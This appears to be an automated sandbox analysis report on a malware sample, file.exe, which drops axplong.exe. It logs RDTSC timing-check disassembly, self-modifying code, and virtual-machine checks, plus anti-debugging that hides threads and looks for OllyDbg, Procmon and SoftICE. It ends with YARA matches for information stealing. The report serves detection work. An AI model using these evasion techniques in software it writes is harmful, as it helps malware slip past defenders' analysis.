                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA02AA second address: 4BA036A instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 call 00007F488D0453F9h 0x0000000d jmp 00007F488D045405h 0x00000012 push eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F488D045407h 0x0000001a jmp 00007F488D045403h 0x0000001f popfd 0x00000020 mov eax, 681C859Fh 0x00000025 popad 0x00000026 mov eax, dword ptr [esp+04h] 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F488D0453FBh 0x00000031 adc ah, FFFFFFEEh 0x00000034 jmp 00007F488D045409h 0x00000039 popfd 0x0000003a jmp 00007F488D045400h 0x0000003f popad 0x00000040 mov eax, dword ptr [eax] 0x00000042 jmp 00007F488D0453FBh 0x00000047 mov dword ptr [esp+04h], eax 0x0000004b push eax 0x0000004c push edx 0x0000004d jmp 00007F488D045404h 0x00000052 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA036A second address: 4BA03AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756CFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edx, 54CBE036h 0x00000012 pushfd 0x00000013 jmp 00007F488C756D07h 0x00000018 jmp 00007F488C756D03h 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA03AF second address: 4BA03B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719221 second address: 719248 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D02h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jg 00007F488C756CF6h 0x00000014 popad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50450 second address: 4B504B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F488D045408h 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F488D0453FBh 0x0000000f adc al, 0000000Eh 0x00000012 jmp 00007F488D045409h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c jmp 00007F488D0453FEh 0x00000021 push eax 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F488D0453FEh 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B504B8 second address: 4B504BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B504BE second address: 4B504C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B504C2 second address: 4B504D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B504D1 second address: 4B504D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B504D7 second address: 4B5050F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F488C756D03h 0x00000009 and ax, 132Eh 0x0000000e jmp 00007F488C756D09h 0x00000013 popfd 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5050F second address: 4B5052D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F488D045403h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5052D second address: 4B505D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push FFFFFFFEh 0x0000000b pushad 0x0000000c mov eax, 0CDA0223h 0x00000011 pushfd 0x00000012 jmp 00007F488C756D08h 0x00000017 xor cx, 3D68h 0x0000001c jmp 00007F488C756CFBh 0x00000021 popfd 0x00000022 popad 0x00000023 push 3EBB23A1h 0x00000028 pushad 0x00000029 pushfd 0x0000002a jmp 00007F488C756D05h 0x0000002f xor eax, 3EE75F86h 0x00000035 jmp 00007F488C756D01h 0x0000003a popfd 0x0000003b mov edi, esi 0x0000003d popad 0x0000003e xor dword ptr [esp], 4842E3B9h 0x00000045 jmp 00007F488C756CFAh 0x0000004a push 1777A5B5h 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B505D0 second address: 4B505D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B505D4 second address: 4B505DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B505DA second address: 4B505EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F488D045400h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B505EE second address: 4B5065F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756CFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b add dword ptr [esp], 5F79084Bh 0x00000012 jmp 00007F488C756D06h 0x00000017 mov eax, dword ptr fs:[00000000h] 0x0000001d jmp 00007F488C756D00h 0x00000022 nop 0x00000023 pushad 0x00000024 mov bh, ah 0x00000026 mov dx, BE2Eh 0x0000002a popad 0x0000002b push eax 0x0000002c jmp 00007F488C756D04h 0x00000031 nop 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F488C756CFAh 0x0000003b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5065F second address: 4B50663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50663 second address: 4B50669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50669 second address: 4B5066F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5066F second address: 4B50673 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50673 second address: 4B5072F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 1Ch 0x0000000b pushad 0x0000000c call 00007F488D045402h 0x00000011 mov bl, ch 0x00000013 pop ebx 0x00000014 call 00007F488D0453FCh 0x00000019 pushfd 0x0000001a jmp 00007F488D045402h 0x0000001f sub cx, 1068h 0x00000024 jmp 00007F488D0453FBh 0x00000029 popfd 0x0000002a pop esi 0x0000002b popad 0x0000002c push eax 0x0000002d jmp 00007F488D045404h 0x00000032 mov dword ptr [esp], ebx 0x00000035 pushad 0x00000036 pushfd 0x00000037 jmp 00007F488D0453FEh 0x0000003c sbb eax, 16538DF8h 0x00000042 jmp 00007F488D0453FBh 0x00000047 popfd 0x00000048 pushad 0x00000049 mov edi, esi 0x0000004b jmp 00007F488D045402h 0x00000050 popad 0x00000051 popad 0x00000052 xchg eax, esi 0x00000053 jmp 00007F488D045400h 0x00000058 push eax 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c mov ecx, ebx 0x0000005e popad 0x0000005f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5072F second address: 4B50735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50735 second address: 4B50739 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50739 second address: 4B5073D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5073D second address: 4B5074B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5074B second address: 4B5077E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F488C756D05h 0x0000000a add eax, 5E460556h 0x00000010 jmp 00007F488C756D01h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5077E second address: 4B507C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 pushfd 0x00000007 jmp 00007F488D045408h 0x0000000c adc si, 4EA8h 0x00000011 jmp 00007F488D0453FBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, edi 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F488D045405h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B507C9 second address: 4B50868 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756D01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F488C756D01h 0x0000000f xchg eax, edi 0x00000010 jmp 00007F488C756CFEh 0x00000015 mov eax, dword ptr [76FBB370h] 0x0000001a pushad 0x0000001b call 00007F488C756CFEh 0x00000020 pushad 0x00000021 popad 0x00000022 pop ecx 0x00000023 pushad 0x00000024 mov cx, dx 0x00000027 jmp 00007F488C756D03h 0x0000002c popad 0x0000002d popad 0x0000002e xor dword ptr [ebp-08h], eax 0x00000031 jmp 00007F488C756D06h 0x00000036 xor eax, ebp 0x00000038 pushad 0x00000039 mov dx, 7D22h 0x0000003d mov bx, 496Eh 0x00000041 popad 0x00000042 push esi 0x00000043 pushad 0x00000044 mov ecx, 1C5ADA07h 0x00000049 push eax 0x0000004a push edx 0x0000004b call 00007F488C756CFAh 0x00000050 pop eax 0x00000051 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50868 second address: 4B508E7 instructions: 0x00000000 rdtsc 0x00000002 mov dx, 1EF6h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [esp], eax 0x0000000c jmp 00007F488D0453FDh 0x00000011 lea eax, dword ptr [ebp-10h] 0x00000014 jmp 00007F488D0453FEh 0x00000019 mov dword ptr fs:[00000000h], eax 0x0000001f pushad 0x00000020 movzx eax, dx 0x00000023 mov dx, 142Eh 0x00000027 popad 0x00000028 mov esi, dword ptr [ebp+08h] 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F488D0453FBh 0x00000032 and ah, FFFFFFDEh 0x00000035 jmp 00007F488D045409h 0x0000003a popfd 0x0000003b popad 0x0000003c mov eax, dword ptr [esi+10h] 0x0000003f jmp 00007F488D0453FDh 0x00000044 test eax, eax 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b popad 0x0000004c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B508E7 second address: 4B508ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B508ED second address: 4B508F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B508F3 second address: 4B508F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B508F7 second address: 4B5092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F48FF3B481Bh 0x0000000e jmp 00007F488D045408h 0x00000013 sub eax, eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F488D0453FCh 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5092D second address: 4B50933 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50933 second address: 4B50937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50937 second address: 4B50963 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488C756CFDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [ebp-20h], eax 0x0000000e jmp 00007F488C756CFEh 0x00000013 mov ebx, dword ptr [esi] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov eax, ebx 0x0000001a popad 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50963 second address: 4B5099D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045405h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-24h], ebx 0x0000000c jmp 00007F488D0453FEh 0x00000011 test ebx, ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F488D0453FAh 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5099D second address: 4B509A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B509A1 second address: 4B509A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B509A7 second address: 4B509AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B509AD second address: 4B509B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B509B1 second address: 4B509B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B509B5 second address: 4B509CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F48FF3B46B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov dh, 52h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B40ECD second address: 4B40F4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F488C756D07h 0x00000008 push eax 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007F488C756D02h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F488C756CFDh 0x0000001e or ecx, 27BA61E6h 0x00000024 jmp 00007F488C756D01h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F488C756D00h 0x00000030 xor ah, FFFFFF88h 0x00000033 jmp 00007F488C756CFBh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 31EB3D second address: 31EB47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F488D0453F6h 0x0000000a rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 31EB47 second address: 31EB4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 4946FB second address: 494716 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F488D045407h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 494DD9 second address: 494DDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeRDTSC instruction interceptor: First address: 494DDF second address: 494DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 56EBC1 instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 71010B instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 70E87D instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 56C3DE instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 738A4E instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 71DE6D instructions caused by: Self-modifying code
                    Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 56EB09 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 31EBC1 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 4C010B instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 4BE87D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 31C3DE instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 4E8A4E instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 4CDE6D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 31EB09 instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04BA02BB rdtsc 0_2_04BA02BB
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1240
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 435
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1191
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3152 Thread sleep time: -46023s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4136 Thread sleep count: 1240 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4136 Thread sleep time: -2481240s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2108 Thread sleep count: 435 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2108 Thread sleep time: -13050000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4812 Thread sleep time: -360000s >= -30000s
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2020 Thread sleep count: 1191 > 30
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2020 Thread sleep time: -2383191s >= -30000s
                    Source: C:\Users\user\Desktop\file.exe File Volume queried: C:\ FullSizeInformation
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
                    Source: axplong.exe, axplong.exe, 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000E68000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW8
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                    Source: axplong.exe, 00000006.00000002.2980255678.0000000000EA9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWh
                    Source: file.exe, 00000000.00000002.1767968117.00000000006ED000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.1796063216.000000000049D000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000002.00000002.1799827982.000000000049D000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                    Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
                    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04BA0816 Start: 04BA0B14 End: 04BA082D 0_2_04BA0816
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
                    Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
                    Source: C:\Users\user\Desktop\file.exe Code function: 0_2_04BA02BB rdtsc 0_2_04BA02BB
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_002E645B mov eax, dword ptr fs:[00000030h] 6_2_002E645B
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_002EA1C2 mov eax, dword ptr fs:[00000030h] 6_2_002EA1C2
                    Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                    Source: axplong.exe, axplong.exe, 00000006.00000002.2978679758.000000000049D000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: $Program Manager
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 6_2_002CD312 cpuid 6_2_002CD312
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeCode function: 6_2_002CCB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,6_2_002CCB1A

                    Stealing of Sensitive Information

                    Source: Yara match File source: 0.2.file.exe.500000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 2.2.axplong.exe.2b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 6.2.axplong.exe.2b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 1.2.axplong.exe.2b0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000001.00000003.1755618042.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000003.1726972956.0000000004980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000002.00000003.1759465892.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000002.00000002.1799745219.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000002.2978563090.00000000002B1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara match File source: 00000006.00000003.2268716495.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
